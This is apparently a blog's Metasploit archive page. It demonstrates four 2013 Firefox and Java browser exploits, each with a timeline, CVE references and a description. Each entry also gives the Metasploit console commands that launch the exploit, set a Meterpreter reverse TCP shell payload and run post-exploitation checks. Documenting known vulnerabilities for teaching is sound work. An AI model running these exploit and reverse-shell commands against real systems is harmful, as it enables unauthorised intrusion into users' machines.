Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to vendor by ZDI the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox previous version 17.0.2

Tested on :

with Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor the 2013-06-18
PoC provided by Packet Storm the 2013-08-12
Metasploit PoC provided the 2013-08-19

PoC provided by :

Name Withheld
sinn3r
juan vazquez

Reference(s) :

CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to cause a memory corruption and escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Commands :

use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Adam Gowdiak the 2013-04-22 (Issue 61)
Vulnerability corrected by vendor the 2013-06-18
Metasploit PoC provided the 2013-06-24
PoC provided by Adam Gowdiak the 2013-07-18

PoC provided by :

Adam Gowdiak
Matthias Kaiser

Reference(s) :

CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Commands :

use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07

PoC provided by :

James Forshaw
juan vazquez

Reference(s) :

CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post

Affected version(s) :

JSE 7 Update 17 and before

Tested on Windows XP Pro with :

JSE 7 Update 17

Description :

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Commands :

use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo